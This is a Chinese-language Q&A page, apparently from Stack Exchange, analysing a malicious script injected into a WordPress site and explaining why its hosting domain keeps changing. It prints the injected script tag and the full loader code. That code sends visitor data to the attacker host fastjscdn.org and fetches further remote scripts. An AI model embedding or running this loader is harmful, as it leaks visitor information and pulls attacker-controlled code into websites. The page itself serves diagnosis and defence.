WordPress站点恶意JS域名自动变更及代码作用咨询
WordPress站点恶意JS问题解答
站点中发现的恶意代码
嵌入在</body>标签前的脚本:
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
该远程脚本的内容:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
注:此前该恶意JS托管在asmr9999.live域名,现已自动变更为fastjscdn.org,且已确认WordPress核心、主题、插件及数据库中无该恶意代码痕迹。
1. 恶意JS托管域名为何能自动变更?
- 核心原因是攻击者远程控制恶意逻辑:嵌入到站点的初始脚本只是一个“加载器”,核心恶意逻辑完全托管在攻击者的远程服务器上。攻击者可以随时修改远程服务器上的JS代码,替换成新的域名,以此躲避安全厂商的域名封禁、拦截等措施,持续作恶。
- 另一种可能是站点输出被劫持:比如服务器存在隐藏后门、CDN缓存被篡改、服务器配置文件(如
.htaccess)被恶意修改,攻击者直接控制了页面输出的脚本地址,随时切换托管域名。
2. 该JS代码对站点的危害?
从代码逻辑来看,危害主要包括:
- 扩大感染范围:脚本会检测当前页面是否被嵌入到iframe中,如果是,就自动给父页面注入相同的恶意脚本,导致更多关联页面被感染。
- 窃取敏感信息:脚本会收集访问者的设备平台信息(如Windows、Mac)和当前站点的URL,发送到攻击者的服务器,用于后续针对性攻击或数据售卖。
- 加载未知恶意代码:脚本会根据你的站点域名,加载攻击者服务器上的专属定制脚本。这部分脚本内容完全由攻击者控制,后续可随时更新为更恶劣的行为,比如:
- 强制植入弹窗广告、跳转恶意站点,严重影响用户体验和站点信誉;
- 窃取用户登录凭证、表单提交数据等敏感信息;
- 植入挖矿脚本,消耗服务器或访问者设备的算力资源;
- 篡改站点页面内容,传播恶意信息或钓鱼链接。
- 持续可控的威胁:只要站点还在加载这个恶意脚本,攻击者就能随时调整恶意行为,威胁具有持续性和不确定性。
目前不止WordPress用户,使用自定义CMS的用户也遭遇同款恶意软件,暂未找到通用解决办法。
内容的提问来源于stack exchange,提问作者hermes_44
相关产品推荐
相关产品推荐

